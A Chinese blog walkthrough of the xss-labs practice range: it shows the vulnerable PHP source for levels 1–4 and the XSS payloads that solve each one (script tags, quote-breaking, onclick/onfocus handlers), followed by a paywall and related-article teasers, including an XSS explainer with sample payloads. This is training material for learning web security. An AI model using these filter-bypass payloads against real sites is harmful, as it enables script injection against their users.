XSS-labs详解

已于 2024-03-25 17:08:32 修改
阅读量3.6k 收藏 36
点赞数 33
文章标签: xss php 前端 xsslabs
于 2024-03-23 16:00:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ytdd66/article/details/136946635
版权
本文围绕XSS靶场展开,介绍了xss - labs的下载地址。详细阐述了多关XSS挑战的绕过方法,如onclick、onfocus事件绕过、a href标签绕过、大小写绕过、双写绕过等,还涉及Referer注入、User Agent注入、cookie注入等,给出了各关对应的payload构造。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

xss-labs下载地址https://github.com/do0dl3/xss-labs

目录

进入靶场点击图片,开始我们的XSS之旅!​

Less-1

Less-2(闭合)

Less-3(onclick onfocus事件绕过)

Less-4(onclick onfocus事件绕过闭合)

Less-5(a href 标签绕过)

Less-6(大小写绕过)

Less-7(双写绕过)

Less-8(unicode编码绕过)

Less-9(注释http://绕过)

Less-10(隐藏的传参)

Less-11(Referer注入)

Less-12(User Agent注入)

Less-13(cookie注入)

Less-14(这一关有问题直接十五关)

Less15(ng-include文件包涵)

Less-16(url编码)

Less-17(embed标签)

Less-18(embed标签)

Less-19-20(flash技术已经全面停用了就不做了)

进入靶场点击图片,开始我们的XSS之旅!

Less-1

查看源码

代码从 URL 的 GET 参数中取得 "name" 的值,然后输出一个居中的标题,内容是 "欢迎用户" 后面跟上这个值,显示从 GET 参数中获取的 "name" 值的字符数。

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

我们修改一下输入尝试一下,没什么难点

直接上payload

<script>alert(1)</script>

点击确认进入下一关

Less-2(闭合)

我们使用第一关的测试方法尝试一下,打咩


直接看源码,看到,尝试一下闭合

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>

看一下这个函数htmlspecialchars

"'><script>alert(1)<%2Fscript><"'

Less-3(onclick onfocus事件绕过)

输入数据,尝试一下输出位置,发现三个位置有输出

直接上源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>	
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>

这里使用 htmlspecialchars 函数对 $str 进行转义

表单包含一个文本输入框,其 name 属性为 "keyword",value 属性设置为 $str。这里也使用了 htmlspecialchars 函数对 $str 进行转义

我们使用一个onclick事件属性进行一个绕过构造payload

' οnclick='alert(1)

也可以使用onfocus事件进行绕过,构造payload

' οnfοcus='alert(1)

Less-4(onclick onfocus事件绕过闭合)

进入第四关我们依旧尝试之前的语句

' οnclick='alert(1),发现不行

查看源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

改变一下闭合,构造payload

"οnclick="alert(1)

"οnfοcus="alert(1)也行

Less-5(a href 标签绕过)

继续尝试,打咩!

查看源码


                

        

    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        


    

      

        

            

              
                
                  羊腿大大
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
XSS-labs

				
			

			

				

					Mccc_li的博客
				

				

					04-09
					
					1156
					
				

			

		

		

			
				
大佬总结的xss的原理
1.level1
输入 < script>alert<\script>就通过了,这道题应该是反射型的xss,数据到了后端再回到浏览器

为什么能够运行?
GET输入了name的参数,然后 PHP 会读取该参数,如果不为空,则直接打印出来,这里不存在任何过滤。也就是说,如果参数中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素。
常见...

			
		

	



                

            
              



	

		

			

				
					
xss-labs通关大合集

					
热门推荐

				
			

			

				

					wo41ge的博客
				

				

					07-26
					
					3万+
					
				

			

		

		

			
				
xss-labs
文章所用的xss-labs靶场的项目地址:https://github.com/do0dl3/xss-labs
然后开始通关

level1

仔细观察三处箭头,可以发现它是向服务器提交了一个name参数,值为“test”,从页面
回显来看,将neme参数的值显示在了页面上,并且显示了name参数值的字符长度
接下来,查看源码

从这里我们可以看到它将name的参数值,插入到了<h2>  </h2>标签之间
那么 就很明显,这一关主要就是考察反射型xss
但是由于不

			
		

	



              


  
              

                


	

		

			

				
					
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻

				
			

			

				

					m0_67844671的博客
				

				

					10-21
					
					6799
					
				

			

		

		

			
				
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻

			
		

	





	

		

			

				
					
XSS介绍&通关XSS-Labs靶场

				
			

			

				

					GaoXianGaoXian的博客
				

				

					03-21
					
					1019
					
				

			

		

		

			
				
XSS介绍&通关XSS-Labs靶场

			
		

	



		

			
		



	

		

			

				
					
xss-labs详解

				
			

			

				

					weixin_52385170的博客
				

				

					09-30
					
					427
					
				

			

		

		

			
				
xss-labs详解

			
		

	





	

		

			

				
					
xsslabs.zip

				
			

			

				

					07-23
				

			

		

		

			
				
xss-labs是国内一个大佬开源的xss漏洞靶子,包含一些常见的xss攻击方法,是学习xss的必备工具

			
		

	





	

		

			

				
					
xss-labs

				
			

			

				

					2302_80044238的博客
				

				

					03-23
					
					1166
					
				

			

		

		

			
				
jsp的全称是java servlet page 它就是java的服务器页面因为它相对于servlet传回数据的方法比较简单Servlet的本质是一个,旨在处理HTTP请求并生成HTTP响应。

			
		

	





	

		

			

				
					
xss-labs-master源码

				
			

			

				

					07-06
				

			

		

		

			
				
XSS Labs Master源码详解:深度探索跨站脚本攻击与防御》  XSS(Cross Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器上执行恶意脚本,进而盗取用户数据或控制用户的行为。"xss-labs-...

			
		

	





	

		

			

				
					
xss-labs-master.rar

				
			

			

				

					05-09
				

			

		

		

			
				
XSS实验室详解:从入门到精通》  XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,允许攻击者在用户浏览器中注入恶意脚本。"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助...

			
		

	





	

		

			

				
					
WEB渗透学习-XSS-labs靶场

				
			

			

				

					04-20
				

			

		

		

			
				
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解**  XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...

			
		

	





	

		

			

				
					
xss-labs-master.zip(xss注入通关游戏/靶场)

				
			

			

				

					03-21
				

			

		

		

			
				
**XSS注入详解**  XSS(Cross Site Scripting),即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。它允许攻击者在用户浏览器上执行恶意脚本,从而获取敏感信息、操控用户行为或进行钓鱼攻击。`xss-labs-master....

			
		

	





	

		

			

				
					
xss-labs.zip

				
			

			

				

					06-25
				

			

		

		

			
				
xss-labs,该环境是用于练习xss跨站脚本攻击的一个集成环境,属于闯关类型。将该环境里的xss类型全部通过,有助于理解xss的攻击原理。

			
		

	





	

		

			

				
					
xss-lab

				
			

			

				

					zl0_00_0的博客
				

				

					02-25
					
					730
					
				

			

		

		

			
				
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面中执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览该页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。

			
		

	





	

		

			

				
					
XSS-Lab(XSS注入教程)

				
			

			

				

					DMXA的博客
				

				

					11-01
					
					949
					
				

			

		

		

			
				
解题思路:先观察题目的类型,猜哪个地方可以存在注入,代码分析这个可以交给chatgpt,下面就可以尝试自己构造好的payload






































                做了10题下来,发现难度是依次上升的解题思路:先观察题目的类型,猜哪个地方可以存在注入,然后是代码分析,这个可以交给chatgpt,下面就可以尝试自己构造好的payload,也可以进行BP抓包看下具体数据,或者指纹识别查一下框架是否有历史漏洞,


XSS常用的标签:

			
		

	





	

		

			

				
					
xss-labs通关全详解

				
			

			

				

					Keeping it fresh at all times.
				

				

					10-09
					
					2360
					
				

			

		

		

			
				
为探讨清楚XSS的诸多细节,我们特选经典的xss-labs进行从入门到进阶的专项训练。在做题过程中,作者把用到的知识进行了全面、详细、系统的总结,形成了本文

			
		

	





	

		

			

				
					
XSS-LABS 浅谈

				
			

			

				

					tricker2的博客
				

				

					07-26
					
					336
					
				

			

		

		

			
				
(⊙﹏⊙)因为自己的原因,第一次写的稿子被自己给搞没了,重新打字就变得有点心情不爽,这次的靶场建立之后我发现了在做关卡的时候却出现了一个其他的问题,我搭建的靶场在输入请求之后会自动把我的单引号转为斜杠加单引号,经过一些验证才知道,这是因为php.ini文件配置中的一点小问题,把他全改成OFF就可以了下面上图
顺便也说下靶场搭建吧,简单的github上下载之后,直接解压到你的集成环境里,我用的是phpstudy,就不过多说了,xss注入分为三个类型反射型,dom型还有存储型三种,主要形成的原因就是前端代码对一

			
		

	





	

		

			

				
					
xss-labs详解(上)1-10

				
			

			

				

					hxhxhxhxx的博客
				

				

					08-02
					
					1260
					
				

			

		

		

			
				
xss-labs详解Level 1Level 2htmlspecialcharsLevel 3Level 4Level 5Level 6Level 7Level 8Level 9LevelLevelLevelLevel
Level 1
源码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-

			
		

	





	

		

			

				
					
XSS靶场闯关(xss-labs)

				
			

			

				

					小郑的博客
				

				

					04-22
					
					2209
					
				

			

		

		

			
				
对数据进行了是否含有http://做了判断,并对关键字做了替换,把数据加到了a标签的href属性中,在属性中的数据可以考虑编码,并利用js的注释符//注释掉http://当前页面上有两个输出地方,一个输出到了h2标签,后台进行了实体编码,另一个输出到input标签的value属性,没有进行html实体编码,考虑闭合input标签。对on,script进行了替换,将数据加到了input标签的value属性中,没有进行实体编码处理,可以考虑a标签的href属性,可以直接写伪协议。

			
		

	





	

		

			

				
					
Xss

					
最新发布

				
			

			

				

					03-30
				

			

		

		

			
				
<think>好的,我现在需要向用户介绍XSS(跨站脚本攻击)。首先,我要确保自己准确理解XSS的概念、类型、危害以及防御方法,这样才能清晰地传达给用户。

首先,XSS的定义。XSS是一种安全漏洞,攻击者通过在网页中注入恶意脚本,当其他用户浏览该页面时,脚本会在他们的浏览器中执行。这可能导致数据窃取或会话劫持等。我需要用简单的语言解释清楚,避免使用太多技术术语,让用户容易理解。

接下来是XSS的类型。常见的类型有三种:反射型、存储型和DOM型。反射型XSS的恶意脚本来自当前HTTP请求,比如URL参数,然后服务器返回的页面中包含这些脚本。存储型XSS则是将恶意脚本存储在服务器上,比如数据库,当其他用户访问时触发。DOM型比较特殊,它不经过服务器,完全在客户端处理,通过修改DOM来执行恶意代码。这里需要举例说明每种类型,帮助用户区分。

然后是XSS的危害。我需要列出几个主要危害,比如窃取用户Cookie、会话劫持、篡改页面内容、重定向到恶意网站、键盘记录等。每个危害都要简明扼要,让用户意识到问题的严重性。

防御措施部分,必须详细且实用。输入验证和过滤是关键,比如对用户输入的数据进行严格检查,过滤或转义特殊字符。输出编码同样重要,确保数据在输出到页面时不会被当作脚本执行。使用HTTP安全头,如Content-Security-Policy(CSP),可以限制脚本的来源。设置Cookie的HttpOnly和Secure属性,避免被JavaScript访问。使用安全的框架和库,比如前端框架自带的安全机制,避免手动操作DOM。定期安全测试,比如渗透测试和代码审计,也是必要的步骤。

在组织内容时,要遵循用户的要求,结构清晰,分点说明。同时,检查是否遵循了系统级指令,比如数学公式是否正确使用$...$,独立公式用$$...$$,但这里可能涉及较少数学内容,不过需要注意如果有变量或代码部分也要正确使用格式。使用中文,确保语法正确。

可能需要考虑用户的知识水平,避免过于技术化,但又要足够详细,让用户理解XSS的原理和防御方法。是否需要补充示例?比如反射型XSS的例子,比如一个带有恶意脚本参数的URL,用户点击后触发。存储型的例子如在评论区插入脚本,其他用户查看评论时执行。DOM型如通过修改URL的hash部分触发脚本。

还需要检查是否有遗漏的重要信息,比如XSS与其他攻击的区别,比如CSRF,但用户只问了XSS,所以可能不需要展开。此外,是否需要提到现代浏览器内置的XSS防护机制,比如X-XSS-Protection,但该头已被CSP取代,所以可能提到CSP更有效。

最后,确保回答真实可靠,引用权威的安全建议,如OWASP的推荐措施。避免错误,比如转义字符的具体方法,比如将<转义为<,>转义为>等。

总结结构应该分为定义、类型、危害、防御措施四个部分,每个部分分点说明,使用中文,结构清晰。同时注意格式要求,比如行内代码或变量用$...$,但XSS本身不是数学公式,可能不需要,但如果有变量如<script>可能需要用代码块或引号,但系统指令主要针对数学表达式,所以可能不需要特别处理。不过还是需要确认是否有需要LaTeX的地方,比如变量名如CSP,可能不需要,所以主要使用普通文本即可。

现在组织内容:

1. 定义:解释XSS是什么,攻击方式。
2. 类型:反射型、存储型、DOM型,各举例子。
3. 危害:窃取信息、会话劫持等。
4. 防御:输入验证、输出编码、CSP、安全Cookie、框架、测试。

检查是否有错误,比如DOM型是否真的不需要服务器参与,是否正确。是的,DOM型完全在客户端处理,比如基于URL中的片段或本地存储的数据修改DOM,触发脚本执行。

最后确保语言口语化,但结构清晰,符合用户要求的中文回答。</think>### XSS(跨站脚本攻击)介绍

#### 1. **定义**  
XSS(Cross-Site Scripting,跨站脚本攻击)是一种网络安全漏洞,攻击者通过向网页注入恶意脚本(如 JavaScript),当其他用户浏览该页面时,脚本会在其浏览器中执行。XSS 的核心目标是绕过“同源策略”,窃取用户敏感信息或劫持会话。

---

#### 2. **攻击类型**  
XSS 分为三种主要类型:  

- **反射型 XSS**  
  - **原理**:恶意脚本来自用户的 HTTP 请求(如 URL 参数),服务器直接将其返回页面中执行。  
  - **示例**:  
    ```url
    http://example.com/search?q=<script>alert('XSS')</script>
    ```
    若服务器未过滤参数 `q`,用户点击此链接时会弹出警告框。

- **存储型 XSS**  
  - **原理**:恶意脚本被永久存储在服务器(如数据库、评论区),当其他用户访问页面时触发。  
  - **示例**:在论坛评论中提交 `<script>stealCookie()</script>`,所有查看该评论的用户都会执行此脚本。

- **DOM 型 XSS**  
  - **原理**:完全在客户端触发,通过修改 DOM 环境(如 URL 片段、本地存储)执行恶意脚本,无需服务器参与。  
  - **示例**:  
    ```javascript
    // 假设页面通过以下代码显示 URL 中的内容
    document.write(location.hash.substring(1));
    ```
    攻击者可构造 URL:`http://example.com#<script>maliciousCode()</script>`。

---

#### 3. **危害**  
XSS 可导致以下风险:  
- **窃取 Cookie**:获取用户登录凭证。  
- **会话劫持**:冒充用户执行操作(如转账)。  
- **页面篡改**:插入虚假内容或钓鱼表单。  
- **重定向攻击**:跳转到恶意网站。  
- **键盘记录**:监控用户输入。  

---

#### 4. **防御措施**  

- **输入验证与过滤**  
  - 对用户输入的数据进行严格检查(如长度、格式),过滤 `<script>`、`onerror` 等危险标签或属性。

- **输出编码**  
  - 将用户输入的内容转义后再输出到页面。例如:  
    - `<` 转义为 `<`  
    - `>` 转义为 `>`  

- **使用 Content-Security-Policy (CSP)**  
  - 通过 HTTP 头限制脚本来源,禁止内联脚本:  
    ```http
    Content-Security-Policy: default-src 'self'
    ```

- **设置安全 Cookie**  
  - 添加 `HttpOnly` 和 `Secure` 属性,防止通过 JavaScript 窃取:  
    ```http
    Set-Cookie: sessionId=abc123; HttpOnly; Secure
    ```

- **避免直接操作 DOM**  
  - 使用安全的框架(如 React、Vue)自动处理编码,避免 `innerHTML` 或 `document.write()`。

- **定期安全测试**  
  - 通过工具(如 OWASP ZAP、Burp Suite)扫描漏洞,进行代码审计。

---

#### 5. **总结**  
XSS 是 Web 安全中最常见的漏洞之一,防御需结合输入过滤、输出编码、CSP 等多层措施。开发者应遵循“不信任用户输入”原则,并持续更新防护策略以应对新型攻击手法。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值